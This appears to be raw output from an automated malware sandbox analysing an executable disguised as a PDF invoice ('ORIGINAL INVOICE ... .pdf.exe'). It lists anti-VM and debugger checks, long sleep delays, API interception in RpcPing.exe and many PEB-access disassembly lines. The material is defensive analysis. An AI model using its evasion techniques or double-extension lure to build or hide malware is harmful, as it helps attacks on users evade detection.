            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: ORIGINAL INVOICE COAU7230734298.pdf.exe PID: 7276, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: C50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: 2640000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: C50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: 7A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: 8A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: 8C40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: 9C40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: 9FD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: AFD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: BFD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A5096E rdtsc 3_2_01A5096E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeWindow / User API: threadDelayed 9836Jump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020Thread sleep count: 136 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020Thread sleep time: -272000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020Thread sleep count: 9836 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020Thread sleep time: -19672000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RpcPing.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose,8_2_0327C000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003372000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930419434.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2544629765.000001DEF1D4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A5096E rdtsc 3_2_01A5096E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004172F3 LdrLoadDll,3_2_004172F3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A50185 mov eax, dword ptr fs:[00000030h]3_2_01A50185
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACC188 mov eax, dword ptr fs:[00000030h]3_2_01ACC188
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACC188 mov eax, dword ptr fs:[00000030h]3_2_01ACC188
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB4180 mov eax, dword ptr fs:[00000030h]3_2_01AB4180
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB4180 mov eax, dword ptr fs:[00000030h]3_2_01AB4180
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9019F mov eax, dword ptr fs:[00000030h]3_2_01A9019F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9019F mov eax, dword ptr fs:[00000030h]3_2_01A9019F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9019F mov eax, dword ptr fs:[00000030h]3_2_01A9019F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9019F mov eax, dword ptr fs:[00000030h]3_2_01A9019F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0A197 mov eax, dword ptr fs:[00000030h]3_2_01A0A197
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0A197 mov eax, dword ptr fs:[00000030h]3_2_01A0A197
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0A197 mov eax, dword ptr fs:[00000030h]3_2_01A0A197
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE61E5 mov eax, dword ptr fs:[00000030h]3_2_01AE61E5
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A401F8 mov eax, dword ptr fs:[00000030h]3_2_01A401F8
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD61C3 mov eax, dword ptr fs:[00000030h]3_2_01AD61C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD61C3 mov eax, dword ptr fs:[00000030h]3_2_01AD61C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A8E1D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A8E1D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E1D0 mov ecx, dword ptr fs:[00000030h]3_2_01A8E1D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A8E1D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A8E1D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A40124 mov eax, dword ptr fs:[00000030h]3_2_01A40124
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov ecx, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov ecx, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov ecx, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE10E mov ecx, dword ptr fs:[00000030h]3_2_01ABE10E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABA118 mov ecx, dword ptr fs:[00000030h]3_2_01ABA118
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABA118 mov eax, dword ptr fs:[00000030h]3_2_01ABA118
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABA118 mov eax, dword ptr fs:[00000030h]3_2_01ABA118
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABA118 mov eax, dword ptr fs:[00000030h]3_2_01ABA118
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD0115 mov eax, dword ptr fs:[00000030h]3_2_01AD0115
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4164 mov eax, dword ptr fs:[00000030h]3_2_01AE4164
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4164 mov eax, dword ptr fs:[00000030h]3_2_01AE4164
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA4144 mov eax, dword ptr fs:[00000030h]3_2_01AA4144
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA4144 mov eax, dword ptr fs:[00000030h]3_2_01AA4144
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA4144 mov ecx, dword ptr fs:[00000030h]3_2_01AA4144
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA4144 mov eax, dword ptr fs:[00000030h]3_2_01AA4144
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA4144 mov eax, dword ptr fs:[00000030h]3_2_01AA4144
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA8158 mov eax, dword ptr fs:[00000030h]3_2_01AA8158
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A16154 mov eax, dword ptr fs:[00000030h]3_2_01A16154
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A16154 mov eax, dword ptr fs:[00000030h]3_2_01A16154
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0C156 mov eax, dword ptr fs:[00000030h]3_2_01A0C156
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A080A0 mov eax, dword ptr fs:[00000030h]3_2_01A080A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA80A8 mov eax, dword ptr fs:[00000030h]3_2_01AA80A8
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD60B8 mov eax, dword ptr fs:[00000030h]3_2_01AD60B8
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD60B8 mov ecx, dword ptr fs:[00000030h]3_2_01AD60B8
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1208A mov eax, dword ptr fs:[00000030h]3_2_01A1208A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0A0E3 mov ecx, dword ptr fs:[00000030h]3_2_01A0A0E3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A180E9 mov eax, dword ptr fs:[00000030h]3_2_01A180E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A960E0 mov eax, dword ptr fs:[00000030h]3_2_01A960E0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0C0F0 mov eax, dword ptr fs:[00000030h]3_2_01A0C0F0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A520F0 mov ecx, dword ptr fs:[00000030h]3_2_01A520F0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A920DE mov eax, dword ptr fs:[00000030h]3_2_01A920DE
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0A020 mov eax, dword ptr fs:[00000030h]3_2_01A0A020
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0C020 mov eax, dword ptr fs:[00000030h]3_2_01A0C020
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA6030 mov eax, dword ptr fs:[00000030h]3_2_01AA6030
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A94000 mov ecx, dword ptr fs:[00000030h]3_2_01A94000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB2000 mov eax, dword ptr fs:[00000030h]3_2_01AB2000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB2000 mov eax, dword ptr fs:[00000030h]3_2_01AB2000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB2000 mov eax, dword ptr fs:[00000030h]3_2_01AB2000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB2000 mov eax, dword ptr fs:[00000030h]3_2_01AB2000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB2000 mov eax, dword ptr fs:[00000030h]3_2_01AB2000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB2000 mov eax, dword ptr fs:[00000030h]3_2_01AB2000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB2000 mov eax, dword ptr fs:[00000030h]3_2_01AB2000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB2000 mov eax, dword ptr fs:[00000030h]3_2_01AB2000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2E016 mov eax, dword ptr fs:[00000030h]3_2_01A2E016
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2E016 mov eax, dword ptr fs:[00000030h]3_2_01A2E016
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2E016 mov eax, dword ptr fs:[00000030h]3_2_01A2E016
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2E016 mov eax, dword ptr fs:[00000030h]3_2_01A2E016
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3C073 mov eax, dword ptr fs:[00000030h]3_2_01A3C073
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A12050 mov eax, dword ptr fs:[00000030h]3_2_01A12050
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96050 mov eax, dword ptr fs:[00000030h]3_2_01A96050
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0E388 mov eax, dword ptr fs:[00000030h]3_2_01A0E388
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0E388 mov eax, dword ptr fs:[00000030h]3_2_01A0E388
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0E388 mov eax, dword ptr fs:[00000030h]3_2_01A0E388
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3438F mov eax, dword ptr fs:[00000030h]3_2_01A3438F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3438F mov eax, dword ptr fs:[00000030h]3_2_01A3438F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A08397 mov eax, dword ptr fs:[00000030h]3_2_01A08397
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A08397 mov eax, dword ptr fs:[00000030h]3_2_01A08397
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A08397 mov eax, dword ptr fs:[00000030h]3_2_01A08397
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A203E9 mov eax, dword ptr fs:[00000030h]3_2_01A203E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A203E9 mov eax, dword ptr fs:[00000030h]3_2_01A203E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A203E9 mov eax, dword ptr fs:[00000030h]3_2_01A203E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A203E9 mov eax, dword ptr fs:[00000030h]3_2_01A203E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A203E9 mov eax, dword ptr fs:[00000030h]3_2_01A203E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A203E9 mov eax, dword ptr fs:[00000030h]3_2_01A203E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A203E9 mov eax, dword ptr fs:[00000030h]3_2_01A203E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A203E9 mov eax, dword ptr fs:[00000030h]3_2_01A203E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2E3F0 mov eax, dword ptr fs:[00000030h]3_2_01A2E3F0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2E3F0 mov eax, dword ptr fs:[00000030h]3_2_01A2E3F0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2E3F0 mov eax, dword ptr fs:[00000030h]3_2_01A2E3F0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A463FF mov eax, dword ptr fs:[00000030h]3_2_01A463FF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACC3CD mov eax, dword ptr fs:[00000030h]3_2_01ACC3CD
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A1A3C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A1A3C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A1A3C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A1A3C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A1A3C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A1A3C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A183C0 mov eax, dword ptr fs:[00000030h]3_2_01A183C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A183C0 mov eax, dword ptr fs:[00000030h]3_2_01A183C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A183C0 mov eax, dword ptr fs:[00000030h]3_2_01A183C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A183C0 mov eax, dword ptr fs:[00000030h]3_2_01A183C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A963C0 mov eax, dword ptr fs:[00000030h]3_2_01A963C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE3DB mov eax, dword ptr fs:[00000030h]3_2_01ABE3DB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE3DB mov eax, dword ptr fs:[00000030h]3_2_01ABE3DB
